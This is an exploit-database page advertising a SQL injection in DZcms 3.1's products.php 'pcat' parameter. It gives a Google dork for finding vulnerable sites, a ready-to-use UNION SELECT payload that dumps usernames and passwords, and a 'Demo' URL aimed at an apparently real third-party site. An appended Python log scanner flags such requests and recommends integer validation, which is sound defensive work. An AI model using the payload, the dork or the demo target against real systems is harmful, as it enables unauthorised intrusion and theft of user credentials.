0day Today Exploits Market and 0day Exploits Database

DZcms v.3.1 (products.php pcat) Remote SQL Injection Vulnerability

Author: Glafkos Charalambous
Risk: Security Risk Unsorted
0day-ID: 0day-ID-4631
Category: web applications
Date added: 11-01-2009
Platform: unsorted
==================================================================
DZcms v.3.1 (products.php pcat) Remote SQL Injection Vulnerability
==================================================================


Application: DZcms v.3.1
Vendor Name: CyDezines
Bug Type: dzCMS SQL Injection Vulnerability
Exploitation: Remote
Severity: High
Solution Status: Unpatched
Google Dork: "Powered by DZcms"

POC: http://www.demo.com/products.php?pcat=1'+union+select+all+convert(group_concat(username,0x3a,password)%20using%20latin1),2,3,4,5+from+users/*

Demo:
http://www.psgdynamicsystems.com/products.php?pcat=1'+union+select+all+convert(group_concat(username,0x3a,password)%20using%20latin1),2,3,4,5+from+users/*

Credits: Glafkos Charalambous
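
Added example (not part of the original advisory and not DZcms code): with the issue listed as unpatched, a log check for the request shape shown in the POC. It assumes combined-format access logs and that legitimate pcat values are plain integers, as the pcat=1 in the POC suggests; SAMPLE_LOG, classify_pcat and scan are names and data constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Jan/2009:10:00:01 +0000] "GET /products.php?pcat=3 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [11/Jan/2009:10:00:07 +0000] "GET /products.php?pcat=1\'+union+select+all+'
    'convert(group_concat(username,0x3a,password)%20using%20latin1),2,3,4,5+from+users/* HTTP/1.1" 200 911',
    '203.0.113.9 - - [11/Jan/2009:10:00:09 +0000] "GET /products.php?pcat=1%27%20UNION%20SELECT%201,2,3,4,5-- HTTP/1.1" 200 640',
    '198.51.100.2 - - [11/Jan/2009:10:01:00 +0000] "GET /index.php?pcat=union HTTP/1.1" 200 300',
    '198.51.100.7 - - [11/Jan/2009:10:02:00 +0000] "GET /products.php?pcat=shoes HTTP/1.1" 200 300',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a valid category id is a short run of ASCII digits.
INTEGER_ID = re.compile(r"[0-9]{1,10}")
# Markers present in the POC: quote, comment openers, UNION SELECT, group_concat.
SQL_MARKERS = re.compile(r"'|/\*|--|\bunion\b.*\bselect\b|\bgroup_concat\b", re.I | re.S)


def classify_pcat(value):
    """Return 'ok', 'sqli' or 'non_integer' for one URL-decoded pcat value."""
    if INTEGER_ID.fullmatch(value):
        return "ok"
    return "sqli" if SQL_MARKERS.search(value) else "non_integer"


def scan(lines):
    """Return (client_ip, verdict, decoded_value) for suspicious products.php requests."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith("/products.php"):
            continue
        # parse_qs decodes both '+' and %XX, so encoded payloads are compared in clear form.
        for value in parse_qs(url.query, keep_blank_values=True).get("pcat", []):
            verdict = classify_pcat(value)
            if verdict != "ok":
                findings.append((line.split()[0], verdict, value))
    return findings


if __name__ == "__main__":
    for ip, verdict, value in scan(SAMPLE_LOG):
        print(f"{verdict:12} {ip:15} pcat={value!r}")
```

The same integer check applied to pcat before it reaches the query is the corresponding input-validation fix on the application side.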



#  0day.today [2024-12-25]  #